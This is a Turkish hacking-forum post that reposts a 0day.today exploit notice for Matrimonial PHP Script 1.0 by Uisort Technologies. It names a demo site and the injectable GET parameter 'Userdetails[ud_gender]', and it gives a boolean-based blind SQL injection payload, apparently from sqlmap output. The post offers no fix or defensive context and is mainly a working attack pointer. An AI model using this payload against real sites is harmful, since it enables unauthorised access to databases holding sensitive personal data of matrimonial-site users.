Hoşgeldin Misafir

Matrimonial PHP Script 1.0 SQL Injection Vulnerability

Asım Gürsoy

mersin
27 Mar 2020
8,833 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Kod:
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                       [ Exploits ]                                   ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                        │ │                                         :
│  Website  : uisort.com                     │ │                                         │
│  Vendor   : Uisort Technologies Pvt. Ltd.  │ │                                         │
│  Software : Matrimonial PHP Script v1.0    │ │  Matrimonial Script PHP tailored with   │
│  Demo     : stage.matrimic.in              │ │  advanced features website              │
│  Vuln Type: Remote SQL Injection           │ │  & mobile apps from matrimic            │
│  Method   : GET                            │ │                                         │
│  Impact   : Database Access                │ │                                         │
│                                            │ │                                         │
│────────────────────────────────────────────┘ └─────────────────────────────────────────│
│                              B4nks-NET irc.b4nks.tk #unix                             ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
 
GET parameter 'Userdetails[ud_gender]' is vulnerable
 
---
Parameter: Userdetails[ud_gender] (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Userdetails[ud_gender]=1 AND 2636=2636
---
 
#  0day.today [2022-08-12]  #